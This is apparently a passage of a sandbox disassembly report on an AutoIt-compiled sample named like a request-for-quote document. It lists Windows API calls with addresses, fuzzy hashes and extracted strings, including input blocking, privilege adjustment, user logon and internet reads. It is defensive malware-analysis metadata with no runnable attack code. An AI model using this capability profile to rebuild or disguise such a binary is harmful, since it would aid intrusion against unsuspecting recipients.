                                              • Process32NextW.KERNEL32(00000000,?), ref: 0015F21F
                                              • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0015F22E
                                              Similarity
                                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                              • String ID:
                                              • API String ID: 2576544623-0
                                              • Opcode ID: 39135be5c78d0136b6eebc6323d579062c0412d4942e95498341430e7cdf2bed
                                              • Instruction ID: 29926f1f960677bd4487634ac454e73a82f760bcc0e43da9ddbca48737bf14cd
                                              • Instruction Fuzzy Hash: 9D515E715083419FD310EF25DC85EABB7E8FF94710F14482DF995A72A2EB70A909CB92
                                              APIs
                                              • lstrlenW.KERNEL32(?,?,?,00000000), ref: 0013EB19
                                              Similarity
                                              • API ID: lstrlen
                                              • String ID: ($|
                                              • API String ID: 1659193697-1631851259
                                              • Opcode ID: a41eab5af74528c39531a08720d056d786b5bd54d5ed596c253e94f505fc994e
                                              • Instruction ID: 6b7cd7c542bb9313d0f9efc36de44b2db0834f8de2a7d7dbe8c003fb5ec0c640
                                              • Instruction Fuzzy Hash: F5320275A007059FDB29CF29C481A6AB7F1FF48320B15C56EE89ADB3A1E770E941CB44
                                              APIs
                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 001526D5
                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 0015270C
                                              Similarity
                                              • API ID: Internet$AvailableDataFileQueryRead
                                              • String ID:
                                              • API String ID: 599397726-0
                                              • Opcode ID: f0b4b17906e632a76455fd8d5d7f7969a96c8e5473a31ab9855c33e6722df664
                                              • Instruction ID: b2bf8c5323148de4b76d117b593f4ba3a11e84d9cbed8038d25a0e663124d492
                                              • Instruction Fuzzy Hash: 43411972600209FFEB20DF54DC85EBB77BCEB55716F10406EFE11AA140EBB09D499650
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0014B5AE
                                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0014B608
                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0014B655
                                              Similarity
                                              • API ID: ErrorMode$DiskFreeSpace
                                              • String ID:
                                              • API String ID: 1682464887-0
                                              • Opcode ID: aa355edc8964d0e44757a0d8d4ee80230c13e4c70743dde62b3932e3f3fbe75b
                                              • Instruction ID: c4554a96a10c6277b7c3915cc2708d20680a1bbd228fa33deb19e0573430ec95
                                              • Instruction Fuzzy Hash: C1216075A00518EFCB00EF65DC80AEDBBB8FF49314F1580A9E805AB361DB31A956CB51
                                              APIs
                                                • Part of subcall function 00100FF6: std::exception::exception.LIBCMT ref: 0010102C
                                                • Part of subcall function 00100FF6: __CxxThrowException@8.LIBCMT ref: 00101041
                                              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00138D0D
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00138D3A
                                              • GetLastError.KERNEL32 ref: 00138D47
                                              Similarity
                                              • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                              • String ID:
                                              • API String ID: 1922334811-0
                                              • Opcode ID: 3d1cce811de0c61c01f61e59125f91adf84d30d3437a8b88d55c7dc57a4b3e17
                                              • Instruction ID: 1e664814e07f62df474566dffdeb5d5da50f1e1e4bf3848323eea6473de79782
                                              • Instruction Fuzzy Hash: 6F118FB2414309AFE7289F54EC85D6BB7B9FB44710B20852EF49697641EB70AC418A60
                                              APIs
                                              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0014404B
                                              • DeviceIoControl.KERNEL32(00000000,002D1400,00000007,0000000C,?,0000000C,?,00000000), ref: 00144088
                                              • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00144091
                                              Similarity
                                              • API ID: CloseControlCreateDeviceFileHandle
                                              • String ID:
                                              • API String ID: 33631002-0
                                              • Opcode ID: 521b7d9e3d90d96073aeed640cee444012cdccfd3e1afbfba1cccb1bc431cd55
                                              • Instruction ID: 5c1ae3255041801df5977cb3d73a4ea2f6b8d5fdc33db14a39d4a5cc09c2c975
                                              • Instruction Fuzzy Hash: 391130B1904228BFE7109BE8DC44FABBBBCEB09750F10065ABA05E71A1D2B4595587A1
                                              APIs
                                              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00144C2C
                                              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00144C43
                                              • FreeSid.ADVAPI32(?), ref: 00144C53
                                              Similarity
                                              • API ID: AllocateCheckFreeInitializeMembershipToken
                                              • String ID:
                                              • API String ID: 3429775523-0
                                              • Opcode ID: 1903a3456b5413cbfcdffa27c6b82e3f8e138ea7c3c0cf7254aa1be8bb6633ce
                                              • Instruction ID: a843619db3e805b5453b29de9510d6e94e142576c91eff7933b3b526564f7964
                                              • Instruction Fuzzy Hash: 52F04975A1130CBFDF04DFF0ED89AAEBBBDEF08201F1044A9E901E2581E7B06A448B50
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 318ec937691826a57990791211b0aafee1de19a55ad9f268d9d7e6e88662a727
                                              • Instruction ID: 118da611bc1dedb30a893239c1a0dc32b5f28547bc698b4a42a6811c7694461a
                                              • Instruction Fuzzy Hash: 7222C270A0029ACFDB24DF55D484ABEB7F0FF08300F148469E896AB396D775AD85CB91
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0014C966
                                              • FindClose.KERNEL32(00000000), ref: 0014C996
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID:
                                              • API String ID: 2295610775-0
                                              • Opcode ID: e0308178ffabac1ea2cff58e0e5d6a2b21f7bc2adba2c3f7693c409e187d9da5
                                              • Instruction ID: 868fac0099830fb5bbcb2c1baa2d728442ce24d543960006b0f8a125e3ba6a13
                                              • Instruction Fuzzy Hash: E51184726106009FD710EF29D845A6AF7E9FF94324F04851EF8A9D73A1DB70AC01CB81
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0015977D,?,0016FB84,?), ref: 0014A302
                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0015977D,?,0016FB84,?), ref: 0014A314
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: fe8113cb1a9928b739033a7a7e142d15e7fdb1bf5849188ddade1d882a82392f
                                              • Instruction ID: 9cb64fa88fcedaf498a07e6596d3f44743a568fde0e0d3a127badd26c8783aa6
                                              • Instruction Fuzzy Hash: 30F0E23518822DBBDB109FA4CC48FEA736DBF08761F004269F918D2191E7709940CBA1
                                              APIs
                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00138851), ref: 00138728
                                              • CloseHandle.KERNEL32(?,?,00138851), ref: 0013873A
                                              Similarity
                                              • API ID: AdjustCloseHandlePrivilegesToken
                                              • String ID:
                                              • API String ID: 81990902-0
                                              • Opcode ID: 00e337a3aaf41d210bf24036e651f51fb82b577c2f0abd64c9fc51a6cf711d85
                                              • Instruction ID: 5afb9a0e5f635d525ea89c45ec512d322a178993745f4a1b4729109e33d241f7
                                              • Instruction Fuzzy Hash: BCE0B676014611EEE7252B60FC09D777BAAEB04350B24882DF4D680874DBA2ACD1DB50
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00108F97,?,?,?,00000001), ref: 0010A39A
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0010A3A3
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: afcd0b846366429b975940d4d3bf9db341bc7ea606665108c84ca870efda3dd9
                                              • Instruction ID: 3d0363cbce769c8e245680afccfe46d7c1bb2d8451b88d2147f51ce8fd3b74e7
                                              • Instruction Fuzzy Hash: 68B09231058208ABCA002B91FC09B883F68FB44AA2F404024F60D84A60EBA25492CA91
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 45e9ffb1fc9d37b51c9ddcb751a961c6e3f92ca895cbb0e166eaec62cefe1190
                                              • Instruction ID: 4cda3920a88ebbe35154c0de2e49ba810f6bb2df9deb1bedec9240e1292468d1
                                              • Opcode Fuzzy Hash: 45e9ffb1fc9d37b51c9ddcb751a961c6e3f92ca895cbb0e166eaec62cefe1190
                                              • Instruction Fuzzy Hash: BC32EF36D69F014DD7239634D832336A259AFB63C4F15D73BE85AB6DE6EB6884C34100
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                              • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3b26512c8618029e71293c93b42eef8a6850ded6e49026735b5165711c152886
                                              • Instruction ID: faceb303a1f89fb940e5a5e3409245f3d7c33eda4918e2f81b3d46f909a9460b
                                              • Opcode Fuzzy Hash: 3b26512c8618029e71293c93b42eef8a6850ded6e49026735b5165711c152886
                                              • Instruction Fuzzy Hash: D4B1E120D2AF414DD2239A39883533ABA6CBFFB2C5B91D71BFC1A74D62EB2185C34141
                                              APIs
                                              • __time64.LIBCMT ref: 00148B25
                                                • Part of subcall function 0010543A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,001491F8,00000000,?,?,?,?,001493A9,00000000,?), ref: 00105443
                                                • Part of subcall function 0010543A: __aulldiv.LIBCMT ref: 00105463
                                              Similarity
                                              • API ID: Time$FileSystem__aulldiv__time64
                                              • String ID:
                                              • API String ID: 2893107130-0
                                              APIs
                                              • BlockInput.USER32(00000001), ref: 00154218
                                              Similarity
                                              • API ID: BlockInput
                                              • String ID:
                                              • API String ID: 3456056419-0
                                              APIs
                                              • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 00144EEC
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID:
                                              • API String ID: 2434400541-0
                                              APIs
                                              • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,001388D1), ref: 00138CB3
                                              Similarity
                                              • API ID: LogonUser
                                              • String ID:
                                              • API String ID: 1244722697-0
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00122242
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0010A36A
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              APIs
                                              • DeleteObject.GDI32(00000000), ref: 00157B70
                                              • DeleteObject.GDI32(00000000), ref: 00157B82
                                              • DestroyWindow.USER32 ref: 00157B90
                                              • GetDesktopWindow.USER32 ref: 00157BAA
                                              • GetWindowRect.USER32(00000000), ref: 00157BB1
                                              • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00157CF2
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00157D02
                                              • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157D4A
                                              • GetClientRect.USER32(00000000,?), ref: 00157D56
                                              • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00157D90
                                              • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DB2
                                              • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DC5
                                              • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DD0
                                              • GlobalLock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DD9
                                              • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DE8
                                              • GlobalUnlock.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DF1
                                              • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157DF8
                                              • GlobalFree.KERNEL32(00000000), ref: 00157E03
                                              • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157E15
                                              • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00172CAC,00000000), ref: 00157E2B
                                              • GlobalFree.KERNEL32(00000000), ref: 00157E3B
                                              • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00157E61
                                              • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00157E80
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00157EA2
                                              • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0015808F
                                              Strings
                                              Similarity
                                              • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                              • String ID: $@U=u$AutoIt v3$DISPLAY$static
                                              • API String ID: 2211948467-3613752883
                                              APIs
                                              • SetTextColor.GDI32(?,00000000), ref: 0016A89F
                                              • GetSysColorBrush.USER32(0000000F), ref: 0016A8D0
                                              • GetSysColor.USER32(0000000F), ref: 0016A8DC
                                              • SetBkColor.GDI32(?,000000FF), ref: 0016A8F6
                                              • SelectObject.GDI32(?,?), ref: 0016A905
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0016A930
                                              • GetSysColor.USER32(00000010), ref: 0016A938
                                              • CreateSolidBrush.GDI32(00000000), ref: 0016A93F
                                              • FrameRect.USER32(?,?,00000000), ref: 0016A94E
                                              • DeleteObject.GDI32(00000000), ref: 0016A955
                                              • InflateRect.USER32(?,000000FE,000000FE), ref: 0016A9A0
                                              • FillRect.USER32(?,?,?), ref: 0016A9D2
                                              • GetWindowLongW.USER32(?,000000F0), ref: 0016A9FD
                                                • Part of subcall function 0016AB60: GetSysColor.USER32(00000012), ref: 0016AB99
                                                • Part of subcall function 0016AB60: SetTextColor.GDI32(?,?), ref: 0016AB9D
                                                • Part of subcall function 0016AB60: GetSysColorBrush.USER32(0000000F), ref: 0016ABB3
                                                • Part of subcall function 0016AB60: GetSysColor.USER32(0000000F), ref: 0016ABBE
                                                • Part of subcall function 0016AB60: GetSysColor.USER32(00000011), ref: 0016ABDB
                                                • Part of subcall function 0016AB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0016ABE9
                                                • Part of subcall function 0016AB60: SelectObject.GDI32(?,00000000), ref: 0016ABFA
                                                • Part of subcall function 0016AB60: SetBkColor.GDI32(?,00000000), ref: 0016AC03
                                                • Part of subcall function 0016AB60: SelectObject.GDI32(?,?), ref: 0016AC10
                                                • Part of subcall function 0016AB60: InflateRect.USER32(?,000000FF,000000FF), ref: 0016AC2F
                                                • Part of subcall function 0016AB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0016AC46
                                                • Part of subcall function 0016AB60: GetWindowLongW.USER32(00000000,000000F0), ref: 0016AC5B
                                              Strings
                                              Similarity
                                              • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                              • String ID: @U=u
                                              • API String ID: 4124339563-2594219639
                                              • Opcode ID: bb6aa164a25611ea7e341522bd7bc3ede189752748e43831582176f0b07847dd
                                              • Instruction ID: 966a389240eb09bad417a73501adfd7d23449f510fb4c9fe67aa0fc0c6ade58b
                                              • Opcode Fuzzy Hash: bb6aa164a25611ea7e341522bd7bc3ede189752748e43831582176f0b07847dd
                                              • Instruction Fuzzy Hash: 9FA17072008301EFD7109F64EC08A6B7BA9FF89321F504A2DF962A61E1D7B1D985CF52
                                              APIs
                                              • CharUpperBuffW.USER32(?,?,0016F910), ref: 001638AF
                                              • IsWindowVisible.USER32(?), ref: 001638D3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: BuffCharUpperVisibleWindow
                                              • String ID: @U=u$ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                              • API String ID: 4105515805-3469695742
                                              • Opcode ID: 3c332e01b15b19900cf84b833a36bb33e6c48ef69607afe6b4980e18047a31a0
                                              • Instruction ID: a496aea843b3314588b2abfddf2b4c5e83131a2fca2416d9753baad1bb71fa83
                                              • Opcode Fuzzy Hash: 3c332e01b15b19900cf84b833a36bb33e6c48ef69607afe6b4980e18047a31a0
                                              • Instruction Fuzzy Hash: 69D1B1302083059FCB14EF50C991AAEB7A5AFA4754F15445CF8966B3E3CB70EE1ACB91
                                              APIs
                                              • DestroyWindow.USER32(?,?,?), ref: 000E2CA2
                                              • DeleteObject.GDI32(00000000), ref: 000E2CE8
                                              • DeleteObject.GDI32(00000000), ref: 000E2CF3
                                              • DestroyIcon.USER32(00000000,?,?,?), ref: 000E2CFE
                                              • DestroyWindow.USER32(00000000,?,?,?), ref: 000E2D09
                                              • SendMessageW.USER32(?,00001308,?,00000000), ref: 0011C68B
                                              • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0011C6C4
                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0011CAED
                                                • Part of subcall function 000E1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,000E2036,?,00000000,?,?,?,?,000E16CB,00000000,?), ref: 000E1B9A
                                              • SendMessageW.USER32(?,00001053), ref: 0011CB2A
                                              • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0011CB41
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0011CB57
                                              • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0011CB62
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                              • String ID: 0$@U=u
                                              • API String ID: 464785882-975001249
                                              • Opcode ID: c8602cca8b687e2ffe978fcada0b2ca83c17f7ab95c9b94a517ee948e6b75e16
                                              • Instruction ID: 67ea45a797ef47db25f9cc3271af5645851a13fdb9be40ce26a4ff0d1ff74bff
                                              • Opcode Fuzzy Hash: c8602cca8b687e2ffe978fcada0b2ca83c17f7ab95c9b94a517ee948e6b75e16
                                              • Instruction Fuzzy Hash: 1212AD70644245EFCB29CF24C884BE9B7E5BF04310F244579E896DB6A2C771EC82CB91
                                              APIs
                                              • DestroyWindow.USER32(00000000), ref: 001577F1
                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 001578B0
                                              • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 001578EE
                                              • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00157900
                                              • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00157946
                                              • GetClientRect.USER32(00000000,?), ref: 00157952
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00157996
                                              • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001579A5
                                              • GetStockObject.GDI32(00000011), ref: 001579B5
                                              • SelectObject.GDI32(00000000,00000000), ref: 001579B9
                                              • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 001579C9
                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 001579D2
                                              • DeleteDC.GDI32(00000000), ref: 001579DB
                                              • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00157A07
                                              • SendMessageW.USER32(00000030,00000000,00000001), ref: 00157A1E
                                              • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00157A59
                                              • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00157A6D
                                              • SendMessageW.USER32(00000404,00000001,00000000), ref: 00157A7E
                                              • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00157AAE
                                              • GetStockObject.GDI32(00000011), ref: 00157AB9
                                              • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00157AC4
                                              • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00157ACE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                              • String ID: @U=u$AutoIt v3$DISPLAY$msctls_progress32$static
                                              • API String ID: 2910397461-2771358697
                                              • Opcode ID: 9030ecf5d77b19eb3b57d3eb8f74c4b4711e1f61585f317cbb0902c2ca144393
                                              • Instruction ID: 41e7e2156b6147329e51869082c5be3346f947015cce96893b7dd3ffb909ecd1
                                              • Opcode Fuzzy Hash: 9030ecf5d77b19eb3b57d3eb8f74c4b4711e1f61585f317cbb0902c2ca144393
                                              • Instruction Fuzzy Hash: 01A19F71A00215BFEB14DBA4EC4AFAE7BB9EB45711F044119FA14EB6E1C7B0AD41CB60
                                              APIs
                                              • GetSysColor.USER32(00000012), ref: 0016AB99
                                              • SetTextColor.GDI32(?,?), ref: 0016AB9D
                                              • GetSysColorBrush.USER32(0000000F), ref: 0016ABB3
                                              • GetSysColor.USER32(0000000F), ref: 0016ABBE
                                              • CreateSolidBrush.GDI32(?), ref: 0016ABC3
                                              • GetSysColor.USER32(00000011), ref: 0016ABDB
                                              • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0016ABE9
                                              • SelectObject.GDI32(?,00000000), ref: 0016ABFA
                                              • SetBkColor.GDI32(?,00000000), ref: 0016AC03
                                              • SelectObject.GDI32(?,?), ref: 0016AC10
                                              • InflateRect.USER32(?,000000FF,000000FF), ref: 0016AC2F
                                              • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0016AC46
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 0016AC5B
                                              • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0016ACA7
                                              • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0016ACCE
                                              • InflateRect.USER32(?,000000FD,000000FD), ref: 0016ACEC
                                              • DrawFocusRect.USER32(?,?), ref: 0016ACF7
                                              • GetSysColor.USER32(00000011), ref: 0016AD05
                                              • SetTextColor.GDI32(?,00000000), ref: 0016AD0D
                                              • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0016AD21
                                              • SelectObject.GDI32(?,0016A869), ref: 0016AD38
                                              • DeleteObject.GDI32(?), ref: 0016AD43
                                              • SelectObject.GDI32(?,?), ref: 0016AD49
                                              • DeleteObject.GDI32(?), ref: 0016AD4E
                                              • SetTextColor.GDI32(?,?), ref: 0016AD54
                                              • SetBkColor.GDI32(?,?), ref: 0016AD5E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                              • String ID: @U=u
                                              • API String ID: 1996641542-2594219639
                                              • Opcode ID: cda57e75bde09811d00595ce15673d056773633bbd888fefa06e8fa059093480
                                              • Instruction ID: 2778c23e2d13e0e3e4ac91e100593bd8c1f080fff54891ba413d06309f3ced6a
                                              • Opcode Fuzzy Hash: cda57e75bde09811d00595ce15673d056773633bbd888fefa06e8fa059093480
                                              • Instruction Fuzzy Hash: E2614E71900218EFDB119FA4EC48EAE7B79FF08320F118129F915AB2A1D7B59D91DF90
                                              APIs
                                              • SetErrorMode.KERNEL32(00000001), ref: 0014AF89
                                              • GetDriveTypeW.KERNEL32(?,0016FAC0,?,\\.\,0016F910), ref: 0014B066
                                              • SetErrorMode.KERNEL32(00000000,0016FAC0,?,\\.\,0016F910), ref: 0014B1C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000001.00000002.1431828042.00000000000E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000E0000, based on PE: true
                                               • Associated: 00000001.00000002.1431806269.00000000000E0000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.000000000016F000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431876418.0000000000195000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431919845.000000000019F000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000001.00000002.1431937447.00000000001A8000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_1_2_e0000_MKCC-MEC-RFQ-115-2024.jbxd
                                              Similarity
                                              • API ID: ErrorMode$DriveType
                                              • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                              • API String ID: 2907320926-4222207086
